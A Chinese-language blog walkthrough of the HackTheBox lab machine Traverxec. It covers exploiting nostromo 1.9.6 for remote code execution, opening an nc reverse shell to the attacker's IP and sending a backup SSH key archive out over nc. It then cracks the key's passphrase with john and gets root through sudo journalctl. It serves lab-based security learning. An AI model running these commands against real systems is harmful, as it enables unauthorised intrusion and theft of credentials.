hackthebox - Traverxec (考点:nostromo安全 & ssh2john & journalctl提权)

最新推荐文章于 2022-11-22 01:54:00 发布
最新推荐文章于 2022-11-22 01:54:00 发布
阅读量388 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/106266226
版权

1 扫描

22想到可能有ssh登录,80进web信息搜集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

2 http漏洞利用 & www-data权限

进入网页搜集信息,以及dirbuster扫,都没什么价值发现。

回头看nmap扫描的80,后面写了是这个服务nostromo 1.9.6,网上很多科普
网上搜这个漏洞,很快就看见了。这里

下载,执行会报错。把那个代码里的cve2019_16278.py注释掉或删掉。

C:\root\exp\mostromo> python 47837.py 10.10.10.165 80 whoami


                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    




HTTP/1.1 200 OK
Date: Thu, 21 May 2020 09:47:33 GMT
Server: nostromo 1.9.6
Connection: close


www-data

ok试whomai是可行的,再执行弹shell命令。收到。

python 47837.py 10.10.10.165 80 "nc -e /bin/sh 10.10.14.43 1337"

3 提权至david

老套路,linenum脚本扫描。这里
扫到了密码hash,但是john解出来,ssh登录,无效。
在这里插入图片描述

不过,这个目录,倒是给了线索,可以再这个目录里继续信息搜集
在这个目录下找到这个

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf 
# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

最后一行提示了新的目录

进去看看,从David里面进

www-data@traverxec:/var/nostromo/conf$ cd /
www-data@traverxec:/$ ls
bin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
www-data@traverxec:/$ cd home
www-data@traverxec:/home$ ls -la
total 12
drwxr-xr-x  3 root  root  4096 Oct 25  2019 .
drwxr-xr-x 18 root  root  4096 Oct 25  2019 ..
drwx--x--x  5 david david 4096 Oct 25  2019 david
www-data@traverxec:/home$ cd david/
www-data@traverxec:/home/david$ ls
ls: cannot open directory '.': Permission denied
www-data@traverxec:/home/david$ ls -la
ls: cannot open directory '.': Permission denied
www-data@traverxec:/home/david$ cd public_www
www-data@traverxec:/home/david/public_www$ ls -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25  2019 .
drwx--x--x 5 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area
www-data@traverxec:/home/david/public_www$ cd protected-file-area/
www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david   45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$ 
www-data@traverxec:/home/david/public_www/protected-file-area$ nc 10.10.14.43 4444 < backup-ssh-identity-files.tgz

一路找,发现有ssh的压缩包文件。
拷到本机后,因为.ssh是隐藏文件,所以解压后从界面看是看不到的。除非你设置看隐藏文件,或者用终端命令进入。

解压出来后,用id_rsa连接ssh但发现还要密码。ssh -i id_rsa david@10.10.10.165
刚好今天上午做的另一台靶机postman靶机是类似情况。
拿ssh2john解密,然后john再解就可以了

C:\root\exp\JohnTheRipper-bleeding-jumbo\run> ./john tra --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
1g 0:00:00:02 DONE (2020-05-21 07:08) 0.3731g/s 5351Kp/s 5351Kc/s 5351KC/sa6_123..*7¡Vamos!
Session completed. 
C:\root\exp\JohnTheRipper-bleeding-jumbo\run>

再连接,输入hunter登陆成功

4 提权至root

在自己家的home目录下信息搜集,有个bin目录,里面有个脚本,打开看看
查看是在执行了journalctl,而它又属于root。网上搜这个是日志管理工具。
参考提权方法神奇网站这个,搜journalctl,按照提示输入!/bin/sh就行了,

当然有些终端可能输入不了命令,需要在先输入这个python -c 'import pty;pty.spawn("/bin/bash")'变成tty交互式,再/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
感觉类似vim或其他编辑器提权那样。既然是root运行,里面又能输入东西。那就输入个!/bin/sh这样给shell的命令,root就会执行,就拿到shell了。

成功变成root。拿下
在这里插入图片描述
冬萍子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nostromo-cli:Nostromo CLI
05-25
第2步-设置API令牌 下一步是填写您的个​​人API令牌。 您可以在用户设置页面中找到此令牌。 之后, .env文件的内容应如下所示 NOSTROMO_API_TOKEN=YOUR_PERSONAL_TOKEN 完成后,通过列出项目来测试一切是否正常。 ...
HackTheBox::Traverxec
aya3t的博客
10-13 51
HackTheBox::Traverxec
靶机渗透练习11-VulnCMS (三个国外著名cms)
Force~
04-03 6183
靶机地址: https://www.vulnhub.com/entry/vulncms-1,710/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -sn 192..
hack the boxTraverxec靶机
zr1213159840的博客
05-01 1317
首先打开靶机,能看到一些提示 先进行扫描看看 nmap -sV -Pn -A 10.10.10.165 通过扫描结果,能看出来开了80端口,还开了22端口。我们访问下80端口,能发现是一个网站,什么davide什么的。 信息不够,我们使用whatweb看下网站的具体信息 whatweb -v 10.10.10.165 有个比较明显的蓝色的标志,nostromo,其实nmap扫描也有,我们进msf搜下,看有没有什么可以利用的。真的有可利用的,启动,利用起来 search nostromo use
Hack The Box——Traverxec
江左盟的博客
02-28 1331
目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 内核提权 SUID提权 总结 简介 这个靶机还算比较简单,只需一步一步慢慢走下去就可以完成了。漏洞发现和利用都比较简单,使用已知漏洞可以直接获得web服务权限的shell,唯一有点难度的可能就是没注意到public_www目录(毕竟只赋予了执行权限,使用ls发现不了),从而获取不到ssh连接的密钥,也可能获取到了ssh连接密钥...
【Hack The Box】linux练习-- Traverxec
人间体佐菲的博客
11-22 716
【Hack The Box】linux练习-- Traverxec
Nostromo:Nostromo Quicksilver界面
05-17
我喜欢BezelHUD的外观,但是我从来没有觉得方形接口可以很好地用于较长的名称/字符串(我经常遇到)。 底漆对此很好用,但是看起来并不好。 我还感觉到很多接口都是在1440x900被认为是大尺寸的情况下设计的。...
jnostromo:Razer Nostromo 电子竞技驱动程序-开源
06-29
jnostromo 包括一个易于使用的配置 gui,可将键从 nostromo 映射到键盘和/或鼠标。 配置 gui 可以隐藏,并且可以随时通过单击系统托盘图标显示 gui。 该项目的目标是让 jnostromo 成为电子竞技和竞技游戏玩家的首选...
Nostromo N50 on Vista,Seven, XP 32&64 !-开源
06-27
在 VISTA、7 和 XP 32/64 上使用 Belkin Nostromo N50 Speedpad。 无需安装驱动,插上设备即可使用! 支持正常/红色/绿色/蓝色程序级别! 在“文件”部分下载与您的操作系统匹配的文件。 GPLv3(源代码)
hackthebox】【Challenges】【Lernaean】
大方子
02-01 1337
一个来自HTB的web挑战 提示语:你的目标对计算机不是很好。尝试并猜测他们的密码,看看他们是否隐藏任何东西! 打开页面,出现“Please do not try to guess my password!” 那么我们用hydra来爆破下 hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64 docker.hackth...
Traverxec黑白翻译+笔记版本.pdf
02-17
hackthebox id217的实验笔记
service.sh
09-16
这个是Linux启动Jar包的批处理文件,可以指定java运行环境。
Nostromo nhttpd系列漏洞利用以及总结
jammny
10-23 1522
前言: Nostromonhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。 Nostromo 目录遍历(CVE-2011-0751) 漏洞详情: 1.9.4之前版本中存在目录遍历漏洞。远程攻击者可以借助URI中的“..%2f”执行任意程序或者读取任意文件。 影响版本: versions <= 1.9.4 POC: #!/bin/sh if [ $# -lt 3 ]; then echo "Usage: $(basename $0) HOST P..
(环境搭建+复现)CVE-2019-16278 Nostromo Web服务器的远程命令执行
daxi0ng的博客
03-13 1606
【CNVD编号】 CVE-2019-16278 【漏洞名称】 Nostromo Web服务器的远程命令执行 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的...
钢筋混凝土污水池及提升泵站施工方案.doc
05-03
课程设计污水处理
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
05-03
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
node-v12.22.10-linux-armv7l.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
The Experiment 3 of Engineering Electromagnetics.pdf
最新发布
05-03
The Experiment 3 of Engineering Electromagnetics.pdf
node-v12.11.0-darwin-x64.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
JSP网络购物中心毕业设计(源代码+设计说明书).zip
05-03
JSP网络购物中心毕业设计(源代码+设计说明书).zip

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值